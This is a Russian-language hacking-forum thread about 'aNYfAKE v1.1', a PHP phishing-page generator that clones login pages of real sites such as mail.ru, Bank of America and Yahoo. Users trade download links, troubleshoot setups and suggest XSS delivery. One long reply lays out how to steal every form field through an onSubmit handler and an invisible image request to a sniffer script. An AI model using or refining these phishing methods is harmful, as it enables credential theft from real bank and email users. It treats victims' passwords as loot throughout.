aNYfAKE v1.1
 

Как настроить читаем на главной странице либо на скрине

Скачать: aNYfAKE_v.1.1.rar | Official
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com

Офигеть =) То, что мне нужно было :) Вот только один недочет вроде есть-на примере майл.ру и его динамическим отображением погоды на примере айпи, то есть если у тебя ай-пишник московский - то при заходе на страницу отображается погода в Москве, если Питерский - то в Питере, но тут айпишник идет сервера на котором стоит скрипт, поэтому у слишком бдительных юзеров может возникнуть подозрение... Это можно как-нибудь исправить?

Конечно можно - настроить скриптенк на работу через проксик нужного города. Только во-первых я думаю это нафик не нужно, потому что если юзер параноик, то скрипт перестаёт работать уже на стадии переадресации (ну то бишь переадресацию и так спалят), ну а во-вторых мне просто-напросто лень, ибо мне ест ьчем ещё заняться =). Вот что планирую ещё добавить - так это урл-спуфинг. Покопаюсь в багтраке и прикручу опциональный спуф урла.

Ещё предложения? Замечания?

у мну Unable to connect to mail.ru

1.все придет к тому что люди не будут знать что ява код надо в теги вставлять.
2.хост не подделывается
можно было тогда замутить с яваскрипт+xss втсавляешь скрипт используя xss и вот фейк..плюс дальнейщая реализация
сорри если не правильно понял)1пост

3.alt+s в опере
дальше в начале странице
<base href=''> и не надо править ссылки кроме как в форме

И соотвественно скачивать ничего не надо(картинки скрипты стили)

Вообще нифига невкурил =)))))) Второй пункт примерно, но смутно, так что распиши, если есть конкретные наработки.

А насчёт третьего пункта - скрипт как раз для того и делался по большей части, что ничего не надо сохранять

Пункт 2
Я имел в виду чтобы твой скрипт генерировал скрипт *.js
загружая его используя xss получался бы фейк,ну типа того
1Тут есть тонкости с самой xss и реализацией ....

Насчет пункта три
Я написал )что
1 нужно в начале странице вставить base href (вместо смены всех ссылок)
2 (дополнение
)нужно вставить ссылку на свой внешний ява скрипт(и больше вообще ничего не надо менять,не ссылки,не даже адрес формы)

Единственное что можно генерировать это как раз пути в это ява скрипте(и то скорее всего они будут относительные-так что опять же особо и генерировать ничего не надо)

Т есть если бы я делал под себя
Я бы написал несоклько типов внешних скриптов *.js
и к сниффу прибавил оповещения(что ты и сделал - т е это несколько функций к снифу каника.)

4.если ты скачиваешь,то полезнее было бы сделать базу фейков.

Если остались еще вопросы и ты их хочешь=\мне задать
пиши в лс а лучше в асю (см профиль )

не хочу мешать полезным сообщениям в теме вроде
"прочитал статью+1аффтару"

у меня тоже самое Unable to connect to mail.ru

Недавно на mail.ru чёт поменяли. win.mail.ru больше не катит, а индекс нормально не обрабатывается. Поэтому на mail.ru временно не пашет

Не думал что понадобится, но наверное надо дописать в начало скрипта

Сокет не хочет открывать =\ Подумай почему =\\\\

and?

Или mail.ru в дауне или нет поддержки сокетов, других вариантов нет

а как можно узнать мой фри хост поддерживает сокет или нет? Faq хостинга читать чтоли? Или есть какой нить скприпт для проверки?

Sadden, ты свой хост скажи.

ho.com.ua (это не реклама)

Да, там сокеты запрещены =\

а где не запрещены из бесплатных? И как ты узнал что там запрещены сокеты?

Нет такого бесплатного хостинга, где бы были разрешены сокеты, ибо тогда бы этим все злоупотребляли.

могли бы поставить лимиты. Наверно такие должны быть.

А что если заставить скрипт при запросе удалённой страницы работать как прокси - отсылать заголовок HTTP_X_FORWARDED_FOR? Будет ли, например тот же самый Mail.RU использовать его?

Да, конечно можно, но:

1) Что это нам реально даст
2) Большое множество всяких погодных ресурсов и тому подоюных, которые выдают контент в соответствии с твоим айпишником не смотрят на этот заголовок

Ну если всё-таки есть ещё какая-то причина, то я наверн добавлю =)

Да ладно :) Есть, например freeshells.ch и ещё www.rootshell.be

PS: исправил линки.

Первый недоступен, второй проверяю...
З.Ы. тема не про хостинги, так что прекращаем оффтоп =\

ачат фекнулся нормально, а вот это не хочет...

желаемый линк - https://www.bankofamerica.com/index.jsp

настройки -

$fakable_host = 'bankofamerica.com'; // The host where the page is situated

$fakable_path = '/'; // The path to a fakeble page

$fakable_script = 'index.jsp'; // Page for fake. F.e. "login.php"


может изза ССЛ ? или мой серв не хочет конектиццо потому что ему чтото не хватает?

Да, это из-за SSL, потому что я там сокет на 80 порт открываю, а https пашет через 443 кажется. Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь. В общем, посмотрим, если сложным это не окажется, то эту задачу я поставлю в свой список вещей для ДОкодивания =\

2Sadden: 1. там написано должно быть :). 2. php код примерно такой:

да ладно... тебе сказать бесплатники, с поддержкой сокетов, без рекламы, с cPanel и кучей других примочек? :)

2dron-anarchy: Мне скажи.

О чем ты?

Ну просто, проверка, возможна ли работа с сокетами.

поищи в теме про бесплатные хостинги мои посты. Я там по-моему говорил.
я не жадный. ниче не скрываю от вас, други мои))

Да простит меня автор).
Скриптик жесть....Чисто поржать.

Я такую ***ню давно не встречал. Этож как надо пхп испоганить чтобы такое написать =(. Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
Вот тут я начал истерично ржать. А если на сайте, данные доступны тока через пост?
И еще убила замена через str_replace, тут регулярки нужны а не перечисливать десятки вариаций.

Строка убийство.

Бугога.

Ну тут сделаем вид что все заебись.

Конструкцию or die надо 100% юзать, ведь при малейшем глюке, жертва должна видеть ,почему ее пароли не остались у хакера.


Конечно, когда не нужны регулярки, их надо юзать.

А зачем это в методе GET?

Тут вижу целых 2 помарки.

"$var" и вторая, это опять что в скрипте есть вывод текста, а хидер не может быть вызван после того как текст отобразился на экране....И тут будет целый камнепад из ошибок скрипта.


Мое резюме: Скрипт полностью не пригоден по работе, возможность того что он спалится, работает пиздец как медленно, сделать фейк вручную быстрее чем настроить этот скрипт.
Вывод: скрипт надо стереть пока его никто не видел.

Ды да.

Вот и вся разница между http и https.


Для тех кто хочет сделать нормальный фейк, объясняю:
Можно сделать два вида фейка, статичный и динамичный. Статичный вы один раз спиздили с сайта html налепили к себе и довольны. Второй динамичный. Каждый раз вы сокетами пиздете html с сайта и изменяет нужные вам данные.

Чем плох фейк от бузи кодера, тем что нарушается работа и структура исходного кода. Потом идёт редирект впустую.

Смысл нормального фейка ,чтобы минимум произвести изменений в сурсе, абсолютно не нарушая его работы. Чтобы данные отослались сразу куда надо, а не на сниффер.

Сделаем это через javascript.

Создаем два постоянных файла sniff.js и sniff.php

sniff.js // Отсылает даные на снифер
sniff.php // Логер
Всё, с нашими файлами закончено. Они будут пригодня для всех фейков, так что трогать их не надо.

Терь будем изменять сурс фейка.

1) Подключаем наш яваскрипт.
2) Меняем исходные ссылки, на ссылки на фейк
3) На форму добавим обработчик OnSubmit
Как только юзер сделает отправку данных, создатся пустой объект картинки(невидимый), при запросе этой картинки, и сработает сниффер, а данные полетят куда им надо, т.е. никакого посредничества и разрыва нету.
Всё...фейк готов. Для универсальности, можно в логере, для каждого случая писать новый лог. А в обработчеке форм, пиздить не тока известные поля, а перехватывать содержимое ВСЕХ элементов форумы.


Удачи.

Убейте меня. Я жить после такого позора не могу.

Да ладно тебе) все нормально. Со всеми бывает)

не бзди. Ибо тут
>> Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
пропущен еще и мой ник))

Как настроить читаем на главной странице либо на скрине :)

Скачать: aNYfAKE_v.1.1.rar | Official
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com

Isis,
c yahoo не получается... может подскажешь настройки?

Блин я привык руками :)

руками не умею. маленький еще ;)
а вот с помощью проги....
Может кто поможет с настройками?